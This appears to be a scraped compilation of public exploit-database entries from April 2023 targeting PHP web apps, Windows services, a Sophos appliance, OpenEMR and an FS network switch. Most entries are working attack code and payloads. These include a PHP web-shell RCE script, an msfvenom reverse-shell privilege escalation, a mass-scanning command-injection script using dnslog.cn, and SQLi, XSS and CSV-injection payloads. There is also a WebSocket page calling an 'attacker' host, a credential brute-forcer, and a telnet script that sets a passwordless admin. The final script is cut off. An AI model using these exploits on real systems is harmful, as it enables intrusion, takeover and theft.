ISHACK AI BOT

# Exploit Title: Multi-Vendor Online Groceries Management System 1.0 - Remote Code Execution (RCE) # Date: 4/23/2023 # Author: Or4nG.M4n # Vendor Homepage: https://www.sourcecodester.com/ # Software Link: https://www.sourcecodester.com/php/15166/multi-vendor-online-groceries-management-system-phpoop-free-source-code.html # Version: 1.0 # Tested on: windows # # Vuln File : SystemSettings.php < here you can inject php code # if(isset($_POST['content'])){ # foreach($_POST['content'] as $k => $v) # file_put_contents("../{$k}.html",$v); <=== put any code into welcome.html or whatever you want # } # Vuln File : home.php < here you can include and execute you're php code # <h3 class="text-center">Welcome</h3> # <hr> # <div class="welcome-content"> # <?php include("welcome.html") ?> <=== include # </div> import requests url = input("Enter url :") postdata = {'content[welcome]':'<?php if(isset($_REQUEST[\'cmd\'])){ echo "<pre>"; $cmd = ($_REQUEST[\'cmd\']); system($cmd); echo "</pre>"; die; }?>'} resp = requests.post(url+"/classes/SystemSettings.php?f=update_settings", postdata) print("[+] injection in welcome page") print("[+]"+url+"/?cmd=ls -al") print("\n")

############################################################################ # # # Exploit Title: Wondershare Filmora 12.2.9.2233 - Unquoted Service Path # # Date: 2023/04/23 # # Exploit Author: msd0pe # # Vendor Homepage: https://www.wondershare.com # # My Github: https://github.com/msd0pe-1 # # # ############################################################################ Wondershare Filmora: Versions =< 12.2.9.2233 contains an unquoted service path which allows attackers to escalate privileges to the system level. [1] Find the unquoted service path: > wmic service get name,pathname,displayname,startmode | findstr /i auto | findstr /i /v "C:\Windows\\" | findstr /i /v """ Wondershare Native Push Service NativePushService C:\Users\msd0pe\AppData\Local\Wondershare\Wondershare NativePush\WsNativePushService.exe Auto [2] Get informations about the service: > sc qc "NativePushService" [SC] QueryServiceConfig SUCCESS SERVICE_NAME: NativePushService TYPE : 10 WIN32_OWN_PROCESS START_TYPE : 2 AUTO_START ERROR_CONTROL : 1 NORMAL BINARY_PATH_NAME : C:\Users\msd0pe\AppData\Local\Wondershare\Wondershare NativePush\WsNativePushService.exe LOAD_ORDER_GROUP : TAG : 0 DISPLAY_NAME : Wondershare Native Push Service DEPENDENCIES : SERVICE_START_NAME : LocalSystem [3] Generate a reverse shell: > msfvenom -p windows/x64/shell_reverse_tcp LHOST=192.168.1.101 LPORT=4444 -f exe -o Wondershare.exe [4] Upload the reverse shell to C:\Users\msd0pe\AppData\Local\Wondershare\Wondershare.exe > put Wondershare.exe > ls drw-rw-rw- 0 Sun Apr 23 14:51:47 2023 . drw-rw-rw- 0 Sun Apr 23 14:51:47 2023 .. drw-rw-rw- 0 Sun Apr 23 14:36:26 2023 Wondershare Filmora Update drw-rw-rw- 0 Sun Apr 23 14:37:13 2023 Wondershare NativePush -rw-rw-rw- 7168 Sun Apr 23 14:51:47 2023 Wondershare.exe drw-rw-rw- 0 Sun Apr 23 13:52:30 2023 WSHelper [5] Start listener > nc -lvp 4444 [6] Reboot the service/server > sc stop "NativePushService" > sc start "NativePushService" OR > shutdown /r [7] Enjoy ! 192.168.1.102: inverse host lookup failed: Unknown host connect to [192.168.1.101] from (UNKNOWN) [192.168.1.102] 51309 Microsoft Windows [Version 10.0.19045.2130] (c) Microsoft Corporation. All rights reserved. C:\Windows\system32>whoami nt authority\system

#!/bin/bash # Exploit Title: Sophos Web Appliance 4.3.10.4 - Pre-auth command injection # Exploit Author: Behnam Abasi Vanda # Vendor Homepage: https://www.sophos.com # Version: Sophos Web Appliance older than version 4.3.10.4 # Tested on: Ubuntu # CVE : CVE-2023-1671 # Shodan Dork: title:"Sophos Web Appliance" # Reference : https://www.sophos.com/en-us/security-advisories/sophos-sa-20230404-swa-rce # Reference : https://vulncheck.com/blog/cve-2023-1671-analysis TARGET_LIST="$1" # ===================== BOLD="\033[1m" RED="\e[1;31m" GREEN="\e[1;32m" YELLOW="\e[1;33m" BLUE="\e[1;34m" NOR="\e[0m" # ==================== get_new_subdomain() { cat MN.txt | grep 'YES' >/dev/null;ch=$? if [ $ch -eq 0 ];then echo -e " [+] Trying to get Subdomain $NOR" rm -rf cookie.txt sub=`curl -i -c cookie.txt -s -k -X $'GET' \ -H $'Host: www.dnslog.cn' -H $'User-Agent: Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:102.0) Gecko/20100101 Firefox/112.0' -H $'Accept: */*' -H $'Accept-Language: en-US,en;q=0.5' -H $'Accept-Encoding: gzip, deflate' -H $'Connection: close' -H $'Referer: http://www.dnslog.cn/' \ $'http://www.dnslog.cn/getdomain.php?t=0' | grep dnslog.cn` echo -e " [+]$BOLD$GREEN Subdomain : $sub $NOR" fi } check_vuln() { curl -k --trace-ascii % "https://$1/index.php?c=blocked&action=continue" -d "args_reason=filetypewarn&url=$RANDOM&filetype=$RANDOM&user=$RANDOM&user_encoded=$(echo -n "';ping $sub -c 3 #" | base64)" req=`curl -i -s -k -b cookie.txt -X $'GET' \ -H $'Host: www.dnslog.cn' -H $'User-Agent: Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:109.0) Gecko/20100101 Firefox/112.0' -H $'Accept: */*' -H $'Accept-Language: en-US,en;q=0.5' -H $'Accept-Encoding: gzip, deflate' -H $'Connection: close' -H $'Referer: http://www.dnslog.cn/' \ $'http://www.dnslog.cn/getrecords.php?t=0'` echo "$req" | grep 'dnslog.cn' >/dev/null;ch=$? if [ $ch -eq 0 ];then echo "YES" > MN.txt echo -e " [+]$BOLD $RED https://$1 Vulnerable :D $NOR" echo "https://$1" >> vulnerable.lst else echo -e " [-] https://$1 Not Vulnerable :| $NOR" echo "NO" > MN.txt fi } echo ' ██████╗██╗ ██╗███████╗ ██████╗ ██████╗ ██████╗ ██████╗ ██╗ ██████╗███████╗ ██╔════╝██║ ██║██╔════╝ ╚════██╗██╔═████╗╚════██╗╚════██╗ ███║██╔════╝╚════██║ ██║ ██║ ██║█████╗█████╗ █████╔╝██║██╔██║ █████╔╝ █████╔╝█████╗╚██║███████╗ ██╔╝ ██║ ╚██╗ ██╔╝██╔══╝╚════╝██╔═══╝ ████╔╝██║██╔═══╝ ╚═══██╗╚════╝ ██║██╔═══██╗ ██╔╝ ╚██████╗ ╚████╔╝ ███████╗ ███████╗╚██████╔╝███████╗██████╔╝ ██║╚██████╔╝ ██║ ╚═════╝ ╚═══╝ ╚══════╝ ╚══════╝ ╚═════╝ ╚══════╝╚═════╝ ╚═╝ ╚═════╝ ╚═╝ ██████╗ ██╗ ██╗ ██████╗ ███████╗██╗ ██╗███╗ ██╗ █████╗ ███╗ ███╗ ██╗ ██╔══██╗╚██╗ ██╔╝ ██╔══██╗██╔════╝██║ ██║████╗ ██║██╔══██╗████╗ ████║ ██╗╚██╗ ██████╔╝ ╚████╔╝ ██████╔╝█████╗ ███████║██╔██╗ ██║███████║██╔████╔██║ ╚═╝ ██║ ██╔══██╗ ╚██╔╝ ██╔══██╗██╔══╝ ██╔══██║██║╚██╗██║██╔══██║██║╚██╔╝██║ ▄█╗ ██║ ██████╔╝ ██║ ██████╔╝███████╗██║ ██║██║ ╚████║██║ ██║██║ ╚═╝ ██║ ▀═╝██╔╝ ╚═════╝ ╚═╝ ╚═════╝ ╚══════╝╚═╝ ╚═╝╚═╝ ╚═══╝╚═╝ ╚═╝╚═╝ ╚═╝ ╚═╝ ' if test "$#" -ne 1; then echo " ----------------------------------------------------------------" echo " [!] please give the target list file : bash CVE-2023-1671.sh targets.txt " echo " ---------------------------------------------------------------" exit fi rm -rf cookie.txt echo "YES" > MN.txt for target in `cat $TARGET_LIST` do get_new_subdomain; echo " [~] Checking $target" check_vuln "$target" done rm -rf MN.txt rm -rf cookie.txt

# Exploit Title: PHP Restaurants 1.0 - SQLi Authentication Bypass & Cross Site Scripting (XSS) # Google Dork: None # Date: 4/26/2023 # Exploit Author: Or4nG.M4n # Vendor Homepage: https://github.com/jcwebhole # Software Link: https://github.com/jcwebhole/php_restaurants # Version: 1.0 functions.php function login(){ global $conn; $email = $_POST['email']; $pw = $_POST['password']; $sql = "SELECT * FROM `users` WHERE `email` = '".$email."' AND `password` = '".md5($pw)."'"; <-- there is No filter to secure sql query parm[email][password] $result = $conn->query($sql); if ($result->num_rows > 0) { while($row = $result->fetch_assoc()) { setcookie('uid', $row['id'], time() + (86400 * 30), "/"); // 86400 = 1 day header('location: index.php'); } } else { header('location: login.php?m=Wrong Password'); } } login bypass at admin page /rest1/admin/login.php email & password : ' OR 1=1 -- <- add [space] end of the payload cross site scripting main page /index.php xhttp.open("GET", "functions.php?f=getRestaurants<?php if(isset($_GET['search'])) echo '&search='.$_GET['search']; <-- here we can insert our xss payload ?> ", true); xhttp.send(); </script> <-- when you insert your'e payload don't forget to add </script> like xss payload : </script><img onerror=alert(1) src=a>

Exploit Title: phpMyFAQ v3.1.12 - CSV Injection Application: phpMyFAQ Version: 3.1.12 Bugs: CSV Injection Technology: PHP Vendor URL: https://www.phpmyfaq.de/ Software Link: https://download.phpmyfaq.de/phpMyFAQ-3.1.12.zip Date of found: 21.04.2023 Author: Mirabbas Ağalarov Tested on: Windows 2. Technical Details & POC ======================================== Step 1. login as user step 2. Go to user control panel and change name as =calc|a!z| and save step 3. If admin Export users as CSV ,in The computer of admin occurs csv injection and will open calculator payload: calc|a!z| Poc video: https://youtu.be/lXwaexX-1uU

Exploit Title: projectSend r1605 - Private file download Application: projectSend Version: r1605 Bugs: IDOR Technology: PHP Vendor URL: https://www.projectsend.org/ Software Link: https://www.projectsend.org/ Date of found: 24-01-2023 Author: Mirabbas Ağalarov Tested on: Linux Technical Details & POC ======================================== 1.Access to private files of any user, including admin just change id GET /process.php?do=download&id=[any user's private pictures id] HTTP/1.1 Host: localhost sec-ch-ua: "Not?A_Brand";v="8", "Chromium";v="108" sec-ch-ua-mobile: ?0 sec-ch-ua-platform: "Linux" Upgrade-Insecure-Requests: 1 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/108.0.5359.125 Safari/537.36 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9 Sec-Fetch-Site: same-origin Sec-Fetch-Mode: navigate Sec-Fetch-User: ?1 Sec-Fetch-Dest: document Referer: http://localhost/manage-files.php Accept-Encoding: gzip, deflate Accept-Language: en-US,en;q=0.9 Cookie: download_started=false; PHPSESSID=e46dtgmf95uu0usnceebfqbp0f Connection: close

Exploit Title: revive-adserver v5.4.1 - Cross-Site Scripting (XSS) Application: revive-adserver Version: 5.4.1 Bugs: XSS Technology: PHP Vendor URL: https://www.revive-adserver.com/ Software Link: https://www.revive-adserver.com/download/ Date of found: 31-03-2023 Author: Mirabbas Ağalarov Tested on: Linux 2. Technical Details & POC ======================================== steps: 1. Go to create banner 2. select the advanced section 3. Write this payload in the prepend and append parameters (%3Cscript%3Ealert%281%29%3C%2Fscript%3E) POST /www/admin/banner-advanced.php HTTP/1.1 Host: localhost Content-Length: 213 Cache-Control: max-age=0 sec-ch-ua: "Not?A_Brand";v="8", "Chromium";v="108" sec-ch-ua-mobile: ?0 sec-ch-ua-platform: "Linux" Upgrade-Insecure-Requests: 1 Origin: http://localhost Content-Type: application/x-www-form-urlencoded User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/108.0.5359.125 Safari/537.36 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9 Sec-Fetch-Site: same-origin Sec-Fetch-Mode: navigate Sec-Fetch-User: ?1 Sec-Fetch-Dest: document Referer: http://localhost/www/admin/banner-advanced.php?clientid=3&campaignid=2&bannerid=2 Accept-Encoding: gzip, deflate Accept-Language: en-US,en;q=0.9 Cookie: sessionID=5224583cf474cd32d2ef37171c4d7894 Connection: close clientid=3&campaignid=2&bannerid=2&token=94c97eabe1ada8e7ae8f204e2ebf7180&prepend=%3Cscript%3Ealert%281%29%3C%2Fscript%3E&append=%3Cscript%3Ealert%281%29%3C%2Fscript%3E&submitbutton=De%C4%9Fi%C5%9Fiklikleri+Kaydet We are sending this link to the admin. then if admin clicks it will be exposed to xss http://localhost/www/admin/banner-advanced.php?clientid=3&campaignid=2&bannerid=2

Exploit Title: admidio v4.2.5 - CSV Injection Application: admidio Version: 4.2.5 Bugs: CSV Injection Technology: PHP Vendor URL: https://www.admidio.org/ Software Link: https://www.admidio.org/download.php Date of found: 26.04.2023 Author: Mirabbas Ağalarov Tested on: Windows 2. Technical Details & POC ======================================== Step 1. login as user step 2. Go to My profile (edit profile) and set postal code as =calc|a!z| and save (http://localhost/admidio/adm_program/modules/profile/profile_new.php?user_uuid=4b060d07-4e63-429c-a6b7-fc55325e92a2) step 3. If admin Export users as CSV or excell file ,in The computer of admin occurs csv injection and will open calculator (http://localhost/admidio/adm_program/modules/groups-roles/lists_show.php?rol_ids=2) payload: =calc|a!z| Poc video: https://www.youtube.com/watch?v=iygwj1izSMQ

# Exploit Title: SoftExpert (SE) Suite v2.1.3 - Local File Inclusion # Date: 27-04-2023 # Exploit Author: Felipe Alcantara (Filiplain) # Vendor Homepage: https://www.softexpert.com/ # Version: 2.0 < 2.1.3 # Tested on: Kali Linux # CVE : CVE-2023-30330 # SE Suite versions tested: 2.0.15.31, 2.0.15.115 # https://github.com/Filiplain/LFI-to-RCE-SE-Suite-2.0 # https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2023-30330 #!/bin/bash # Usage: ./lfi-poc.sh <domain> <username> <password> <File Path> target=$1 u=$2 p=$3 file=$(echo -n "$4"|base64 -w 0) end="\033[0m\e[0m" red="\e[0;31m\033[1m" blue="\e[0;34m\033[1m" echo -e "\n$4 : $file\n" echo -e "${blue}\nGETTING SESSION COOKIE${end}" cookie=$(curl -i -s -k -X $'POST' \ -H "Host: $target" -H $'User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:102.0) Gecko/20100101 Firefox/102.0' -H $'Accept: */*' -H $'Accept-Language: en-US,en;q=0.5' -H $'Accept-Encoding: gzip, deflate' -H $'Content-Type: application/x-www-form-urlencoded; charset=UTF-8' -H $'X-Requested-With: XMLHttpRequest' -H $'Content-Length: 213' -H "Origin: https://$target" -H "Referer: https://$target/softexpert/login?page=home" -H $'Sec-Fetch-Dest: empty' -H $'Sec-Fetch-Mode: cors' -H $'Sec-Fetch-Site: same-origin' -H $'Te: trailers' -H $'Connection: close' \ -b $'language=1; _ga=GA1.3.151610227.1675447324; SEFGLANGUAGE=1; mode=deploy' \ --data-binary "json=%7B%22AuthenticationParameter%22%3A%7B%22language%22%3A3%2C%22hashGUID%22%3Anull%2C%22domain%22%3A%22%22%2C%22accessType%22%3A%22DESKTOP%22%2C%22login%22%3A%22$u%22%2C%22password%22%3A%22$p%22%7D%7D" \ "https://$target/softexpert/selogin"|grep se-authentication-token |grep "=" |cut -d ';' -f 1|sort -u|cut -d "=" -f 2) echo "cookie: $cookie" function LFI () { curl -s -k -X $'POST' \ -H "Host: $target" -H "User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:102.0) Gecko/20100101 Firefox/102.0" -H "Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8" -H 'Accept-Language: en-US,en;q=0.5' -H 'Accept-Encoding: gzip, deflate' -H 'Content-Type: application/x-www-form-urlencoded' -H "Origin: https://$target" -H "Referer: https://$target/softexpert/workspace?page=home" -H 'Upgrade-Insecure-Requests: 1' -H 'Sec-Fetch-Dest: document' -H 'Sec-Fetch-Mode: navigate' -H 'Sec-Fetch-Site: same-origin' -H 'Te: trailers' -H 'Connection: close' \ -b "se-authentication-token=$cookie; _ga=GA1.3.151610227.1675447324; SEFGLANGUAGE=1; mode=deploy" \ --data-binary "action=4&managerName=lol&managerPath=$file&className=ZG9jX2RvY3VtZW50X2FkdmFuY2VkX2dyb3VwX2ZpbHRlcg%3D%3D&instantiate=false&loadJquery=false" \ "https://$target/se/v42300/generic/gn_defaultframe/2.0/defaultframe_filter.php" } echo -e "${blue}\nExploiting LFI:${end}" LFI function logout () { curl -i -s -k -X $'POST' \ -H "Host: $target" -H $'Content-Length: 0' -H $'Sec-Ch-Ua: \"Not_A Brand\";v=\"99\", \"Google Chrome\";v=\"109\", \"Chromium\";v=\"109\"' -H $'Accept: application/json, text/javascript, */*; q=0.01' -H $'X-Requested-With: XMLHttpRequest' -H $'Sec-Ch-Ua-Mobile: ?0' -H $'User-Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/109.0.0.0 Safari/537.36' -H $'Sec-Ch-Ua-Platform: \"Linux\"' -H "Origin: https://$target" -H $'Sec-Fetch-Site: same-origin' -H $'Sec-Fetch-Mode: cors' -H $'Sec-Fetch-Dest: empty' -H "Referer: https://$target/softexpert/workspace?page=home" -H $'Accept-Encoding: gzip, deflate' -H $'Accept-Language: en-US,en;q=0.9' -H $'Connection: close' \ -b "se-authentication-token=$cookie; language=1; _ga=GA1.3.1890963078.1675081150; twk_uuid_5db840c5e4c2fa4b6bd8f89a=%7B%22uuid%22%3A%221.bJmDVb5PBlMumGNq2QO9gxk5hjdc6sp2pgENmao2hxHntg00r0qllmuXqCXTWG9uYLT1GkRDFuPY4ir63UIEJEXSS0pIJi8YlIvsB4edfrG1RTcS3CPr58feQBNf1%22%2C%22version%22%3A3%2C%22domain%22%3A%22$target%22%2C%22ts%22%3A1675081174571%7D; mode=deploy" \ "https://$target/softexpert/selogout" } echo -e "${blue}\nLogging out${end}" logout >/dev/null echo -e "\n\nDone!"

## Exploit Title: Serendipity 2.4.0 - File Inclusion RCE ## Author: nu11secur1ty ## Date: 04.26.2023 ## Vendor: https://docs.s9y.org/index.html ## Software: https://github.com/s9y/Serendipity/releases/tag/2.4.0 ## Reference: https://portswigger.net/web-security/file-upload ## Reference: https://portswigger.net/web-security/file-upload/lab-file-upload-remote-code-execution-via-web-shell-upload ## Description: The already authenticated attacker can upload HTML files on the server, which is absolutely dangerous and STUPID In this file, the attacker can be codding a malicious web-socket responder that can connect with some nasty webserver somewhere. It depends on the scenario, the attacker can steal every day very sensitive information, for a very long period of time, until the other users will know that something is not ok with this system, and they decide to stop using her, but maybe they will be too late for this decision. STATUS: HIGH Vulnerability [+]Exploit: ```HTML <!DOCTYPE html> <html> <head> <meta charset="utf-8"> <title>NodeJS WebSocket Server</title> </head> <body> <h1>You have just sent a message to your attacker,<br> <h1>that you are already connected to him.</h1> <script> const ws = new WebSocket("ws://attacker:8080"); ws.addEventListener("open", () =>{ console.log("We are connected to you"); ws.send("How are you, dear :)?"); }); ws.addEventListener('message', function (event) { console.log(event.data); }); </script> </body> </html> ``` ## Reproduce: [href](https://github.com/nu11secur1ty/CVE-nu11secur1ty/tree/main/vendors/s9y/2023/Serendipity-2.4.0) ## Proof and Exploit: [href](https://streamable.com/2s80z6) ## Time spend: 01:27:00 -- System Administrator - Infrastructure Engineer Penetration Testing Engineer Exploit developer at https://packetstormsecurity.com/ https://cve.mitre.org/index.htmlhttps://cxsecurity.com/ and https://www.exploit-db.com/ 0day Exploit DataBase https://0day.today/ home page: https://www.nu11secur1ty.com/ hiPEnIMR0v7QCo/+SEH9gBclAAYWGnPoBIQ75sCj60E=nu11secur1ty <http://nu11secur1ty.com/>

# Exploit Title: MilleGPG5 5.9.2 (Gennaio 2023) - Local Privilege Escalation / Incorrect Access Control # Date: 2023-04-28 # Exploit Author: Andrea Intilangelo # Vendor Homepage: https://millegpg.it/ # Software Homepage: https://millegpg.it - https://millewin.it/prodotti/governo-clinico-3/ # Software Link: https://www.millegpg.it/download/MilleGPGInstall.exe # Version: 5.9.2 # Tested on: Microsoft Windows 10 Enterprise x64 22H2, build 19045.2913 # CVE: CVE-2023-25438 MilleGPG / MilleGPG5 also known as "Governo Clinico 3" Vendor: Millennium S.r.l. / Dedalus Group - Dedalus Italia S.p.a. / Genomedics S.r.l. Affected/tested version: MilleGPG5 5.9.2 Summary: Mille General Practice Governance (MilleGPG): an interactive tool to address an effective quality of care through the Italian general practice network. MilleGPG is an innovative IT support for the evaluation and optimization of patient care and intervention processes, complete with new features for the management of the COVID-19 vaccine campaign. It is An irreplaceable "ally" for the General Practitioner, also offering contextual access to the most authoritative scientific content and CME training. Vuln desc: The application is prone to insecure file/folder permissions on its default installation path, wrongly allowing some files to be modified by unprivileged users, malicious process and/or threat actor. Attacker can exploit the weakness abusing the "write" permission of the main application available to all users on the system or network. Details: Any low privileged user can elevate their privileges abusing files/folders that have incorrect permissions, e.g.: C:\Program Files\MilleGPG5\MilleGPG5.exe (main gui application) C:\Program Files\MilleGPG5\plugin\ (GPGCommand.exe, nginx and php files) C:\Program Files\MilleGPG5\k-platform\ (api and webapp files) such as BUILTIN\Users:(I)(OI)(CI)(R,W) and/or FILE_GENERIC_WRITE, FILE_WRITE_DATA and FILE_WRITE_EA

Exploit Title: PHPFusion 9.10.30 - Stored Cross-Site Scripting (XSS) Application: PHPFusion Version: 9.10.30 Bugs: XSS Technology: PHP Vendor URL: https://www.php-fusion.co.uk/home.php Software Link: https://sourceforge.net/projects/php-fusion/ Date of found: 28-04-2023 Author: Mirabbas Ağalarov Tested on: Linux 2. Technical Details & POC ======================================== steps: 1. Go to Fusion file manager (http://localhost/PHPFusion%209.10.30/files/administration/file_manager.php?aid=ecf01599cf9cd553#elf_l1_Lw) 2. upload malicious svg file svg file content ===> <?xml version="1.0" standalone="no"?> <!DOCTYPE svg PUBLIC "-//W3C//DTD SVG 1.1//EN" "http://www.w3.org/Graphics/SVG/1.1/DTD/svg11.dtd"> <svg version="1.1" baseProfile="full" xmlns="http://www.w3.org/2000/svg"> <polygon id="triangle" points="0,0 0,50 50,0" fill="#009900" stroke="#004400"/> <script type="text/javascript"> alert(document.location); </script> </svg> poc request: POST /PHPFusion%209.10.30/files/includes/elFinder/php/connector.php?aid=ecf01599cf9cd553 HTTP/1.1 Host: localhost Content-Length: 1198 sec-ch-ua: "Not?A_Brand";v="8", "Chromium";v="108" sec-ch-ua-platform: "Linux" sec-ch-ua-mobile: ?0 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/108.0.5359.125 Safari/537.36 Content-Type: multipart/form-data; boundary=----WebKitFormBoundaryxF2jB690PpLWInAA Accept: */* Origin: http://localhost Sec-Fetch-Site: same-origin Sec-Fetch-Mode: cors Sec-Fetch-Dest: empty Referer: http://localhost/PHPFusion%209.10.30/files/administration/file_manager.php?aid=ecf01599cf9cd553 Accept-Encoding: gzip, deflate Accept-Language: en-US,en;q=0.9 Cookie: fusion2847q_lastvisit=1682673668; fusion2847q_user=1.1682850094.7126692a74723afe3bc7e3fb130a60838c1aa1bcae83f7497402ce9f009f96ff; fusion2847q_admin=1.1682850118.14c483fed28d5a89734c158bbb9aa88eab03a5c4a97316c372dd3b2591d6982a; fusion2847q_session=q0ifs4lhqt9fm6h3jclbea79vf; fusion2847q_visited=yes; usertbl_results=user_joined%2Cuser_lastvisit%2Cuser_groups; usertbl_status=0 Connection: close ------WebKitFormBoundaryxF2jB690PpLWInAA Content-Disposition: form-data; name="reqid" 187c77be8e52cf ------WebKitFormBoundaryxF2jB690PpLWInAA Content-Disposition: form-data; name="cmd" upload ------WebKitFormBoundaryxF2jB690PpLWInAA Content-Disposition: form-data; name="target" l1_Lw ------WebKitFormBoundaryxF2jB690PpLWInAA Content-Disposition: form-data; name="hashes[l1_U1ZHX1hTUy5zdmc]" SVG_XSS.svg ------WebKitFormBoundaryxF2jB690PpLWInAA Content-Disposition: form-data; name="upload[]"; filename="SVG_XSS.svg" Content-Type: image/svg+xml <?xml version="1.0" standalone="no"?> <!DOCTYPE svg PUBLIC "-//W3C//DTD SVG 1.1//EN" "http://www.w3.org/Graphics/SVG/1.1/DTD/svg11.dtd"> <svg version="1.1" baseProfile="full" xmlns="http://www.w3.org/2000/svg"> <polygon id="triangle" points="0,0 0,50 50,0" fill="#009900" stroke="#004400"/> <script type="text/javascript"> alert(document.location); </script> </svg> ------WebKitFormBoundaryxF2jB690PpLWInAA Content-Disposition: form-data; name="mtime[]" 1681116842 ------WebKitFormBoundaryxF2jB690PpLWInAA Content-Disposition: form-data; name="overwrite" 0 ------WebKitFormBoundaryxF2jB690PpLWInAA-- 3. Then go to images (http://localhost/PHPFusion%209.10.30/files/administration/images.php?aid=ecf01599cf9cd553) or directly go to svg file( http://localhost/PHPFusion%209.10.30/files/images/SVG_XSS.svg) poc video : https://youtu.be/6yBLnRH8pOY

# Exploit Title: Advanced Host Monitor v12.56 - Unquoted Service Path # Date: 2023-04-23 # CVE: CVE-2023-2417 # Exploit Author: MrEmpy # Vendor Homepage: https://www.ks-soft.net # Software Link: https://www.ks-soft.net/hostmon.eng/downpage.htm # Version: > 12.56 # Tested on: Windows 10 21H2 Title: ================ Advanced Host Monitor > 12.56 - Unquoted Service Path Summary: ================ An unquoted service path vulnerability has been discovered in Advanced Host Monitor version > 12.56 affecting the executable "C:\Program Files (x86)\HostMonitor\RMA-Win\rma_active.exe" . This vulnerability occurs when the service's path is misconfigured, allowing an attacker to run a malicious file instead of the legitimate executable associated with the service. An attacker with local user privileges could exploit this vulnerability to replace the legitimate RMA-Win\rma_active.exe service executable with a malicious file of the same name and located in a directory that has a higher priority than the legitimate directory. That way, when the service starts, it will run the malicious file instead of the legitimate executable, allowing the attacker to execute arbitrary code, gain unauthorized access to the compromised system, or stop the service from functioning. To exploit this vulnerability, an attacker would need local access to the system and the ability to write and replace files on the system. The vulnerability can be mitigated by correcting the service path to correctly quote the full path of the executable, including quotation marks. Furthermore, it is recommended that users keep software updated with the latest security updates and limit physical and network access to their systems to prevent malicious attacks. Proof of Concept: ================ C:\>sc qc ActiveRMAService [SC] QueryServiceConfig SUCCESS SERVICE_NAME: ActiveRMAService TYPE : 110 WIN32_OWN_PROCESS (interactive) START_TYPE : 2 AUTO_START ERROR_CONTROL : 1 NORMAL BINARY_PATH_NAME : C:\Program Files (x86)\HostMonitor\RMA-Win\rma_active.exe /service LOAD_ORDER_GROUP : TAG : 0 DISPLAY_NAME : KS Active Remote Monitoring Agent DEPENDENCIES : SERVICE_START_NAME : LocalSystem

# Exploit Title: OpenEMR v7.0.1 - Authentication credentials brute force # Date: 2023-04-28 # Exploit Author: abhhi (Abhishek Birdawade) # Vendor Homepage: https://www.open-emr.org/ # Software Link: https://github.com/openemr/openemr/archive/refs/tags/v7_0_1.tar.gz # Version: 7.0.1 # Tested on: Windows ''' Example Usage: - python3 exploitBF.py -l "http://127.0.0.1/interface/main/main_screen.php?auth=login&site=default" -u username -p pass.txt ''' import requests import sys import argparse, textwrap from pwn import * #Expected Arguments parser = argparse.ArgumentParser(description="OpenEMR <= 7.0.1 Authentication Bruteforce Mitigation Bypass", formatter_class=argparse.RawTextHelpFormatter, epilog=textwrap.dedent(''' Exploit Usage : python3 exploitBF.py -l http://127.0.0.1/interface/main/main_screen.php?auth=login&site=default -u username -p pass.txt python3 exploitBF.py -l http://127.0.0.1/interface/main/main_screen.php?auth=login&site=default -ul user.txt -p pass.txt python3 exploitBF.py -l http://127.0.0.1/interface/main/main_screen.php?auth=login&site=default -ul /Directory/user.txt -p /Directory/pass.txt''')) parser.add_argument("-l","--url", help="Path to OpenEMR (Example: http://127.0.0.1/interface/main/main_screen.php?auth=login&site=default)") parser.add_argument("-u","--username", help="Username to Bruteforce for.") parser.add_argument("-ul","--userlist", help="Username Dictionary") parser.add_argument("-p","--passlist", help="Password Dictionary") args = parser.parse_args() if len(sys.argv) < 2: print (f"Exploit Usage: python3 exploitBF.py -h") sys.exit(1) # Variable LoginPage = args.url Username = args.username Username_list = args.userlist Password_list = args.passlist log.info('OpenEMR Authentication Brute Force Mitigation Bypass Script by abhhi \n ') def login(Username,Password): session = requests.session() r = session.get(LoginPage) # Progress Check process = log.progress('Brute Force') #Specifying Headers Value headerscontent = { 'User-Agent' : 'Mozilla/5.0 (X11; Linux x86_64; rv:78.0) Gecko/20100101 Firefox/78.0', 'Referer' : f"{LoginPage}", 'Origin' : f"{LoginPage}", } #POST REQ data postreqcontent = { 'new_login_session_management' : 1, 'languageChoice' : 1, 'authUser' : f"{Username}", 'clearPass' : f"{Password}" } #Sending POST REQ r = session.post(LoginPage, data = postreqcontent, headers = headerscontent, allow_redirects= False) #Printing Username:Password process.status('Testing -> {U}:{P}'.format(U = Username, P = Password)) #Conditional loops if 'Location' in r.headers: if "/interface/main/tabs/main.php" in r.headers['Location']: print() log.info(f'SUCCESS !!') log.success(f"Use Credential -> {Username}:{Password}") sys.exit(0) #Reading User.txt & Pass.txt files if Username_list: userfile = open(Username_list).readlines() for Username in userfile: Username = Username.strip() passfile = open(Password_list).readlines() for Password in passfile: Password = Password.strip() login(Username,Password)

# Exploit Title: FS-S3900-24T4S Privilege Escalation # Date: 29/04/2023 # Exploit Author: Daniele Linguaglossa & Alberto Bruscino # Vendor Homepage: https://www.fs.com/ # Software Link: not available # Version: latest # Tested on: latest # CVE : CVE-2023-30350 import sys import telnetlib def exploit(args): print(args) if len(args) != 1: print(f"Usage: {sys.argv[0]} <ip>") sys.exit(1) else: ip = args[0] try: with telnetlib.Telnet(ip, 23) as tn: try: tn.read_until(b"Username: ") tn.write(b"guest\r\n") tn.read_until(b"Password: ") tn.write(b"guest\r\n") tn.read_until(b">") tn.write(b"enable\r\n") tn.read_until(b"Password: ") tn.write(b"super\r\n") tn.read_until(b"#") tn.write(b"configure terminal\r\n") tn.read_until(b"(config)#") tn.write(b"username admin nopassword\r\n") tn.read_until(b"(config)#") print( "Exploit success, you can now login with username: admin and password: <empty>") tn.close() except KeyboardInterrupt: print("Exploit failed") 